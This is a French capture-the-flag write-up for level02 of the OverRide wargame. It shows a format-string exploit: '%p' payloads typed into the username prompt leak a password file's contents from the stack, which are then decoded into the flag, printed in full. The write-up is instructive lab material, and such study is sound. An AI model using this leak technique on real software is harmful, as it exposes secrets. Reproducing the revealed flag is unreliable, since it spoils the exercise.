le code lit ce qu'il y a dans le fichier de .pass du level02

le soucis est que sur gdb je ne peut pas l'ouvrir car je n'ai pas les droits dessus donc 
il va me sortir une erreur sur le open:

open("/home/users/level03/.pass", O_RDONLY) = -1 EACCES (Permission denied)

je peux creer un fichier dans /tmp/fichier.txt et le lui faire lire en changeant le nom du fichier avec gdb, puis 
je rempli ce meme fichier de 41 "A" (41 parce que c'est la taille qui est lu dans le fichier fd_pass_file) pour que ce soit bien visible sur gdb et savoir par la suite a quel emplacement 
se trouve le fichier

une fois fait je lance gdb avec le binaire et je modifie le nom du fichier avant le call fopen a +148

 $ r <<< $(python -c 'print(" %p " * 200 + "\n" + "fakepassword\n")'); 

le 200 est la juste pour remplir le buffer mais il y en a moins qui sont prit en compte...

$ set $rdi="/tmp/fichier.txt"


$ (gdb) c
Continuing.
===== [ Secure Access System v1.0 ] =====
/***************************************\
| You must login to access this system. |
\**************************************/
--[ Username: --[ Password: *****************************************
0x7fffffffe4c0 (nil) 0x25 0x2a2a2a2a2a2a2a2a 0x2a2a2a2a2a2a2a2a 0x7fffffffe6b8 0x1f7ff9a08 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x100207025 (nil) 0x4141414141414141 0x4141414141414141 0x4141414141414141 0x4141414141414141 0x4141414141414141 0x41 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070  does not have access!
[Inferior 1 (process 1705) exited with code 01]

$  r <<< $(python -c 'print(" %22$p %23$p %24$p %25$p %26$p %27$p " + "\n" + "fakepassword\n")')

$ (gdb) set $rdi="/tmp/fichier.txt"

$ (gdb) c
Continuing.
===== [ Secure Access System v1.0 ] =====
/***************************************\
| You must login to access this system. |
\**************************************/
--[ Username: --[ Password: *****************************************
0x4141414141414141 0x4141414141414141 0x4141414141414141 0x4141414141414141 0x4141414141414141 0x41 does not have access!

Maintenant qu'on sait ou est stocke le mdp il faut faire de meme avec le vrais fichier

$ level02@OverRide:~$ ./level02 
===== [ Secure Access System v1.0 ] =====
/***************************************\
| You must login to access this system. |
\**************************************/
--[ Username:  %22$p %23$p %24$p %25$p %26$p %27$p 
--[ Password: qwer
*****************************************
 0x756e505234376848 0x45414a3561733951 0x377a7143574e6758 0x354a35686e475873 0x48336750664b394d (nil)  does not have access!


il faut maintenant le traduire en text

voir fichier python

$ python translate_little_endian_to_txt.py " 0x756e505234376848 0x45414a3561733951 0x377a7143574e6758 0x354a35686e475873 0x48336750664b394d"

flag = Hh74RPnuQ9sa5JAEXgNWCqz7sXGnh5J5M9KfPg3H

